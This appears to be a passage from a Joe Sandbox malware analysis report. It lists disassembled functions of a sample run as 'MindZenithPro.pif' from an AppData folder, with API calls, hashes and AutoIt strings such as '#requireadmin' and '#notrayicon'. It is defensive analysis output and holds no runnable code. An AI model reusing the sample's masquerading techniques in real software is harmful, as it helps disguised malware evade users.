                                    • Instruction Fuzzy Hash: 22415072A00228BFCB11DFA4DD41ADEBBB8EF45300F04405AFA45B7181DB756E85CB95
                                    Function 003F19EE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif,00000104), ref: 003F1A29
                                    • _free.LIBCMT ref: 003F1AF4
                                    • _free.LIBCMT ref: 003F1AFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif
                                    • API String ID: 2506810119-2202584320
                                    • Opcode ID: 9a9b0b8952862c96154b11d07915b1f2e5306b0346dac65507233e4c45216d38
                                    • Instruction ID: 6904e4dfd921cdbed5a747df9248f1984dc86f9f2f493e960b5a480e1799e351
                                    • Opcode Fuzzy Hash: 9a9b0b8952862c96154b11d07915b1f2e5306b0346dac65507233e4c45216d38
                                    • Instruction Fuzzy Hash: 97318271A0120CEFDF22DF99AD85DAEBBBCEF95310B1140A6E6049B211D7B08E40CB94
                                    Function 0042C862 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0042C8EB
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0042C931
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004929B0,00D652F8), ref: 0042C97A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem
                                    • String ID: 0
                                    • API String ID: 135850232-4108050209
                                    • Opcode ID: 9585fa55452aa04ac329340cc283d76b5593d4efc01638c8eeaa9acb7aa61e7b
                                    • Instruction ID: 56ae346f21e1b466f06f74057d7a8b67462980d9b4dc4becd73e6ccd309b39a2
                                    • Opcode Fuzzy Hash: 9585fa55452aa04ac329340cc283d76b5593d4efc01638c8eeaa9acb7aa61e7b
                                    • Instruction Fuzzy Hash: 7E41CEB12043119FD720DF24E884F2BBBE4AF85324F50461EE9A597391D774E944CB5A
                                    Function 00454BD6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0045DC1C,00000000,?,?,?,?), ref: 00454C6A
                                    • GetWindowLongW.USER32 ref: 00454C87
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00454C97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 50c74c47f51c995ec10ebbd61c43cc5aa0c046f5403cd0254883f596b1c6d574
                                    • Instruction ID: 9b7aa0cc7edff00b6fd5bab06d6604acca08afd27d2f630542a71f1433c11fe5
                                    • Opcode Fuzzy Hash: 50c74c47f51c995ec10ebbd61c43cc5aa0c046f5403cd0254883f596b1c6d574
                                    • Instruction Fuzzy Hash: 5631D231100205ABDB229E38CC45BDB77A9EF84329F210726F979972D2C774EC958754
                                    Function 0042756A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SysReAllocString.OLEAUT32(?,?), ref: 004275E6
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 00427601
                                    • VariantClear.OLEAUT32(?), ref: 0042760B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyString
                                    • String ID: #qB
                                    • API String ID: 2173805711-1807501728
                                    • Opcode ID: 4419899b33da47f84c8ef35118b8ecf49e69940fc9cd7a74644676809f1bb90a
                                    • Instruction ID: 5edc99278c9a1ea217209199dc923966462e427c2616ef037e80d83aaa5799e4
                                    • Opcode Fuzzy Hash: 4419899b33da47f84c8ef35118b8ecf49e69940fc9cd7a74644676809f1bb90a
                                    • Instruction Fuzzy Hash: 883127B0709764DFDB05AF28EC41A7E777AEF44350B5000A9F4028B2A1C7389D12DB59
                                    Function 004437D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00443AE2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,004437FE,?,?), ref: 00443AFF
                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00443801
                                    • _wcslen.LIBCMT ref: 00443822
                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 0044388D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 946324512-2422070025
                                    • Opcode ID: 466e12ddc60a840a8e1c01baa925ee9353dcea203d5ac6ecc9548d66b56b3301
                                    • Instruction ID: 49840fce81c320bf9ec515a2f76c8afc837cd8c1a1e4b63831e36116a5cd0e87
                                    • Opcode Fuzzy Hash: 466e12ddc60a840a8e1c01baa925ee9353dcea203d5ac6ecc9548d66b56b3301
                                    • Instruction Fuzzy Hash: B0310435600201DFEB10EF29C485E6AB7E0EF54719F24849AF8128B3A2D739EE45CB64
                                    Function 00454676 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004546FE
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00454712
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00454736
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 521730d63980ab736e5030980807b40dc294ff4493944ebd53c9f9b1dbdb72e0
                                    • Instruction ID: 2b123bfa207252f564d65cdcea39521ed20f14d7c52c1111669c170cdc8f6112
                                    • Opcode Fuzzy Hash: 521730d63980ab736e5030980807b40dc294ff4493944ebd53c9f9b1dbdb72e0
                                    • Instruction Fuzzy Hash: CF21D332600218BBDF158F50CC42FEB3B65FF89718F110115FE15AB1D1DAB9AC998B94
                                    Function 00454E13 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00454EC5
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00454ED3
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00454EDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: 59664c61a9cb63433d149b8ced17665bc33dfeba629cd4c4d272ddf5794b1ba9
                                    • Instruction ID: c3eb3f5d37f85748a976d564105ebada51cf3fc097c14d0224fa1fb4ec9d87ff
                                    • Opcode Fuzzy Hash: 59664c61a9cb63433d149b8ced17665bc33dfeba629cd4c4d272ddf5794b1ba9
                                    • Instruction Fuzzy Hash: 47217CB5600208BFDB11DF64DC82D7B37ACEB99369B10045AFA019B3A2CA74EC558B64
                                    Function 00429C61 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 176396367-2734436370
                                    • Opcode ID: d62cd11faff038e581941c4905b6b87f29cd39758997a37c0838812577069f9c
                                    • Instruction ID: 1c816315954725f0fa3d1a6f6833bd801c2f220392abb84e6d8a344bc526d55b
                                    • Opcode Fuzzy Hash: d62cd11faff038e581941c4905b6b87f29cd39758997a37c0838812577069f9c
                                    • Instruction Fuzzy Hash: 98213B3135027176D722A725FC06FB773D8DF95300F90812BF5468B285EBA99D42D399
                                    Function 00435163 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00435177
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004351CB
                                    • SetErrorMode.KERNEL32(00000000,?,?,0045DC1C), ref: 0043523F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume
                                    • String ID: %lu
                                    • API String ID: 2507767853-685833217
                                    • Opcode ID: f4dc760ca0918473d859f73174f95d21a9d4fb949562601ebf117f62e8b5181b
                                    • Instruction ID: 479b178d37ec028ae6924cd4eeab4b321d1b2fe9a17381bba78a8170ddf16cec
                                    • Opcode Fuzzy Hash: f4dc760ca0918473d859f73174f95d21a9d4fb949562601ebf117f62e8b5181b
                                    • Instruction Fuzzy Hash: 98314475A00209AFDB11DF54C985EAA77F8EF08308F1440A9F909DB352DB75EE46CBA1
                                    Function 004549AB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00454A0F
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00454A24
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00454A31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 782fef3b0bc0165906c9e3992b3b8c495719f16a687f6a20c6e727ea1f9f8b3c
                                    • Instruction ID: 3b8e3564263c8eca1c0f9578ac6cae492dee6de4bc9dbe5e3a901030de74d11a
                                    • Opcode Fuzzy Hash: 782fef3b0bc0165906c9e3992b3b8c495719f16a687f6a20c6e727ea1f9f8b3c
                                    • Instruction Fuzzy Hash: 691127312402087EEF205E25CC46FAB37A8EFC5759F010529FE51E7191D675DC518718
                                    Function 00423633 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                      • Part of subcall function 00423489: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004234A7
                                      • Part of subcall function 00423489: GetWindowThreadProcessId.USER32(?,00000000), ref: 004234B8
                                      • Part of subcall function 00423489: GetCurrentThreadId.KERNEL32 ref: 004234BF
                                      • Part of subcall function 00423489: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004234C6
                                    • GetFocus.USER32 ref: 00423659
                                      • Part of subcall function 004234D0: GetParent.USER32(00000000), ref: 004234DB
                                    • GetClassNameW.USER32(?,?,00000100), ref: 004236A4
                                    • EnumChildWindows.USER32(?,0042371C), ref: 004236CC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                    • String ID: %s%d
                                    • API String ID: 1272988791-1110647743
                                    • Opcode ID: e181002b5eaa74ac337a1d5bd0966a2b3cb8bbf0f46c09b232cf7f315bccf1ba
                                    • Instruction ID: 0e72f4cb42f4d7140455955294e2ec5a69773e5b5eb3d7df70090bb0c54e466f
                                    • Opcode Fuzzy Hash: e181002b5eaa74ac337a1d5bd0966a2b3cb8bbf0f46c09b232cf7f315bccf1ba
                                    • Instruction Fuzzy Hash: CA11A5B17002156BCF127FB1AC85FEE37B99F84305F04407AFD099B283DA389A468B64
                                    Function 003C47A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(?), ref: 003C47DD
                                    • DestroyWindow.USER32(?,003C303B,?,?,?,?,?,003C2F8C,?,?), ref: 003C483A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: DeleteDestroyObjectWindow
                                    • String ID: ,)I$,)I
                                    • API String ID: 2587070983-3044016994
                                    • Opcode ID: 9a5d9f33ebfe7ddded96715028dcb9c079f85f0bc083a31578d0151cb6929967
                                    • Instruction ID: 46f678e19611b938a66dd563ad83d6075d8aae3bcc22a215537c5bf0b2e2348e
                                    • Opcode Fuzzy Hash: 9a5d9f33ebfe7ddded96715028dcb9c079f85f0bc083a31578d0151cb6929967
                                    • Instruction Fuzzy Hash: EE213BB0B06202AFDB19EF14EA64F2537E4BB64311F02407FE801DB2A0DBB59D41DB08
                                    Function 00456042 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00456081
                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004560AE
                                    • DrawMenuBar.USER32(?), ref: 004560BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$InfoItem$Draw
                                    • String ID: 0
                                    • API String ID: 3227129158-4108050209
                                    • Opcode ID: dee62b16fa5d0c4471e00b483e280fd1c1d8255c900d1fb41d58a6e894b22334
                                    • Instruction ID: c877d7f4955132b16dfe1c1972e5ee0615d2189054392f529cf8beb3596b6c36
                                    • Opcode Fuzzy Hash: dee62b16fa5d0c4471e00b483e280fd1c1d8255c900d1fb41d58a6e894b22334
                                    • Instruction Fuzzy Hash: 95018031500218EFDB219F51DC44BAFBBB4FF04762F1080A6E849DA292DB758A88DF25
                                    Function 0045885E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00494028,0049406C), ref: 004588AB
                                    • CloseHandle.KERNEL32 ref: 004588BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CloseCreateHandleProcess
                                    • String ID: (@I$l@I
                                    • API String ID: 3712363035-2858493133
                                    • Opcode ID: e5f378ad37880afb388f49ce92d90b1bd440fc86d75c7fa919a25a5611608922
                                    • Instruction ID: d3909556d361892de9ff9efea8b545555be98d114f09d41165c8da25c6a58168
                                    • Opcode Fuzzy Hash: e5f378ad37880afb388f49ce92d90b1bd440fc86d75c7fa919a25a5611608922
                                    • Instruction Fuzzy Hash: 3FF089B2540354BAE7106B62EC46F773B5CEB55351F000132BF09E91D2D6B54C1583BC
                                    Function 00420706 Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59dcd5b4df604ba6692b58c974dd6710aaddeca1d2c516d49ea10dd740faad04
                                    • Instruction ID: 7272ac7731a0e0a0bb030e3266ad209e6c667fb914123d128493a5f74702004c
                                    • Opcode Fuzzy Hash: 59dcd5b4df604ba6692b58c974dd6710aaddeca1d2c516d49ea10dd740faad04
                                    • Instruction Fuzzy Hash: 0DC18B75B00226EFDB14DF94D884AAABBF5FF48304F508199E806EB252D735ED81CB94
                                    Function 003F41D0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    • Opcode ID: 821b1641172eb135a2d80ec0c1676ad926138ade85bd6b12bc2734553cb7d40d
                                    • Instruction ID: 84bc9e3acf6d8dae1bbd154f9f612d0fb13c25dc08f501722af9041f9b23451d
                                    • Opcode Fuzzy Hash: 821b1641172eb135a2d80ec0c1676ad926138ade85bd6b12bc2734553cb7d40d
                                    • Instruction Fuzzy Hash: A3A15635A0038E9FDB23CF19C8817BFBBE5EF51310F19416EEA84AB282C2789941C750
                                    Function 00443BB5 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInitInitializeUninitialize
                                    • String ID:
